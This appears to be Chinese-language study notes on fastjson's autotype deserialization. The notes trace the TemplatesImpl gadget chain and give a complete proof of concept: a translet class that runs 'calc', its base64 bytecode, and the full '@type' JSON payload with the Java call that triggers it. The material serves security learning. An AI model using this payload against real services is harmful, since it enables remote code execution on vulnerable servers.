1. fastjson 简单使用
类
package gfftufukv;
public class User {
String name;
private String grage = "";
public User() {
System.out.println("constrctor1");
}
public User(String name) {
System.out.println("constrctor2");
this.name = name;
}
public String getName() {
System.out.println("getName");
return name;
}
public void setName(String name) {
System.out.println("setName");
this.name = name;
}
public String getGrade(){
System.out.println("getGrade");
return grage;
}
@Override
public String toString() {
return "User{" +
"name='" + name + '\'' +
", grage='" + grage + '\'' +
'}';
}
}
!!!grage 没有setter
案例case
package gfftufukv;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
/**
* Hello world!
*
*/
public class App
{
public static void main( String[] args )
{
//Simple Case
User user = new User("asdf");
String json = JSON.toJSONString(user);
System.out.println(json);
System.out.println("++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
//Exception in thread "main" java.lang.ClassCastException: com.alibaba.fastjson.JSONObject cannot be cast to gfftufukv.User
// at gfftufukv.App.main(App.java:18)
// User user1 = (User) JSON.parse(json);
// System.out.println(user1.getName());
String type = "{\"@type\":\"gfftufukv.User\",\"name\":\"asdf\",\"grage\":\"1212\"}";
User user1 = (User) JSON.parse(type);
//实际上调用了getter setter
System.out.println(user1);
System.out.println("++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
//Feature.SupportNonPublicField
User user2 = JSON.parseObject(type,User.class, Feature.SupportNonPublicField);
System.out.println(user2);
System.out.println("++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
//Feature.SupportNonPublicField
//调用toString 支持toString的方法就行
String user3 = JSON.parseObject(type,String.class, Feature.SupportNonPublicField);
System.out.println(user3);
System.out.println("++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
//Feature.SupportNonPublicField
//调用toString 支持toString的方法就行
User user4 = (User) JSON.parse(type,Feature.SupportNonPublicField);
System.out.println(user4);
}
}
结果
constrctor2
getGrade
getName
{"grade":"","name":"asdf"}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage=''}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage='1212'}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage='1212'}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
constrctor1
setName
User{name='asdf', grage='1212'}
总结
调用点
constrctor
set......
get......
私有变量修改
Feature.SupportNonPublicField
类型
User user2 = JSON.parseObject(type,User.class, Feature.SupportNonPublicField);
//需要的类就可以如user
String user3 = JSON.parseObject(type,String.class, Feature.SupportNonPublicField);
//调用toString 支持toString的方法就行
2.利用
需要寻找getXxxx,并且可以序列化的类
于是发现了TemplatesImpl
是否可利用
public synchronized Properties getOutputProperties() {
try {
return newTransformer().getOutputProperties();
}
catch (TransformerConfigurationException e) {
return null;
}
}
newTransformer()
public synchronized Transformer newTransformer()
throws TransformerConfigurationException
{
TransformerImpl transformer;
transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
_indentNumber, _tfactory);
if (_uriResolver != null) {
transformer.setURIResolver(_uriResolver);
}
if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
transformer.setSecureProcessing(true);
}
return transformer;
}
getTransletInstance
private Translet getTransletInstance()
throws TransformerConfigurationException {
try {
if (_name == null) return null;
if (_class == null) defineTransletClasses();
// The translet needs to keep a reference to all its auxiliary
// class to prevent the GC from collecting them
AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
translet.postInitialization();
translet.setTemplates(this);
translet.setServicesMechnism(_useServicesMechanism);
translet.setAllowedProtocols(_accessExternalStylesheet);
if (_auxClasses != null) {
translet.setAuxiliaryClasses(_auxClasses);
}
return translet;
}
catch (InstantiationException e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
catch (IllegalAccessException e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
}
实例化
AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
调用defineTransletClasses 获取_class
_class[i] = loader.defineClass(_bytecodes[i]);
private void defineTransletClasses()
throws TransformerConfigurationException {
if (_bytecodes == null) {
ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
throw new TransformerConfigurationException(err.toString());
}
TransletClassLoader loader = (TransletClassLoader)
AccessController.doPrivileged(new PrivilegedAction() {
public Object run() {
return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
}
});
try {
final int classCount = _bytecodes.length;
_class = new Class[classCount];
if (classCount > 1) {
_auxClasses = new HashMap<>();
}
for (int i = 0; i < classCount; i++) {
_class[i] = loader.defineClass(_bytecodes[i]);
final Class superClass = _class[i].getSuperclass();
// Check if this is the main class
if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
_transletIndex = i;
}
else {
_auxClasses.put(_class[i].getName(), _class[i]);
}
}
if (_transletIndex < 0) {
ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
}
catch (ClassFormatError e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
catch (LinkageError e) {
ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
throw new TransformerConfigurationException(err.toString());
}
}
原料
AbstractTranslet
构造payload
测试类
package gfftufukv;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
//类选择看 AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
public class ExpTranslet extends AbstractTranslet {
public ExpTranslet(){
System.out.println("===============EXP++================");
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
new ExpTranslet();
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
转成base64
import base64
def file2base64(File):
with open(File,"rb") as file:
return base64.b64encode(file.read()).decode()
print(file2base64("./ExpTranslet.class"))
因为java base64 用了报错
换回payload里面
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADMARwoADAAsCQAtAC4IAC8KADAAMQoAMgAzCAA0CgAyADUHADYKAAgANwcAOAoACgAsBwA5AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAR0aGlzAQAXTGdmZnR1ZnVrdi9FeHBUcmFuc2xldDsBAA1TdGFja01hcFRhYmxlBwA4BwA2AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwA6AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAQRXhwVHJhbnNsZXQuamF2YQwADQAOBwA7DAA8AD0BACQ9PT09PT09PT09PT09PT1FWFArKz09PT09PT09PT09PT09PT0HAD4MAD8AQAcAQQwAQgBDAQAEY2FsYwwARABFAQATamF2YS9pby9JT0V4Y2VwdGlvbgwARgAOAQAVZ2ZmdHVmdWt2L0V4cFRyYW5zbGV0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAwAAAAAAAQAAQANAA4AAQAPAAAAiAACAAIAAAAeKrcAAbIAAhIDtgAEuAAFEga2AAdXpwAITCu2AAmxAAEADAAVABgACAADABAAAAAeAAcAAAAOAAQADwAMABEAFQAUABgAEgAZABMAHQAVABEAAAAWAAIAGQAEABIAEwABAAAAHgAUABUAAAAWAAAAEAAC/wAYAAEHABcAAQcAGAQACQAZABoAAQAPAAAANwACAAEAAAAJuwAKWbcAC1exAAAAAgAQAAAACgACAAAAGAAIABkAEQAAAAwAAQAAAAkAGwAcAAAAAQAdAB4AAgAPAAAAPwAAAAMAAAABsQAAAAIAEAAAAAYAAQAAAB4AEQAAACAAAwAAAAEAFAAVAAAAAAABAB8AIAABAAAAAQAhACIAAgAjAAAABAABACQAAQAdACUAAgAPAAAASQAAAAQAAAABsQAAAAIAEAAAAAYAAQAAACMAEQAAACoABAAAAAEAFAAVAAAAAAABAB8AIAABAAAAAQAmACcAAgAAAAEAKAApAAMAIwAAAAQAAQAkAAEAKgAAAAIAKw=="],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}
只是计算器
触发payload
String text1 = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADMARwoADAAsCQAtAC4IAC8KADAAMQoAMgAzCAA0CgAyADUHADYKAAgANwcAOAoACgAsBwA5AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAR0aGlzAQAXTGdmZnR1ZnVrdi9FeHBUcmFuc2xldDsBAA1TdGFja01hcFRhYmxlBwA4BwA2AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwA6AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAQRXhwVHJhbnNsZXQuamF2YQwADQAOBwA7DAA8AD0BACQ9PT09PT09PT09PT09PT1FWFArKz09PT09PT09PT09PT09PT0HAD4MAD8AQAcAQQwAQgBDAQAEY2FsYwwARABFAQATamF2YS9pby9JT0V4Y2VwdGlvbgwARgAOAQAVZ2ZmdHVmdWt2L0V4cFRyYW5zbGV0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAwAAAAAAAQAAQANAA4AAQAPAAAAiAACAAIAAAAeKrcAAbIAAhIDtgAEuAAFEga2AAdXpwAITCu2AAmxAAEADAAVABgACAADABAAAAAeAAcAAAAOAAQADwAMABEAFQAUABgAEgAZABMAHQAVABEAAAAWAAIAGQAEABIAEwABAAAAHgAUABUAAAAWAAAAEAAC/wAYAAEHABcAAQcAGAQACQAZABoAAQAPAAAANwACAAEAAAAJuwAKWbcAC1exAAAAAgAQAAAACgACAAAAGAAIABkAEQAAAAwAAQAAAAkAGwAcAAAAAQAdAB4AAgAPAAAAPwAAAAMAAAABsQAAAAIAEAAAAAYAAQAAAB4AEQAAACAAAwAAAAEAFAAVAAAAAAABAB8AIAABAAAAAQAhACIAAgAjAAAABAABACQAAQAdACUAAgAPAAAASQAAAAQAAAABsQAAAAIAEAAAAAYAAQAAACMAEQAAACoABAAAAAEAFAAVAAAAAAABAB8AIAABAAAAAQAmACcAAgAAAAEAKAApAAMAIwAAAAQAAQAkAAEAKgAAAAIAKw==\n\"],\"_name\":\"a.b\",\"_tfactory\":{ },\"_outputProperties\":{ },\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}";
System.out.println(text1);
Object obj = JSON.parseObject(text1, Object.class, Feature.SupportNonPublicField);
原理详解 稍后更新
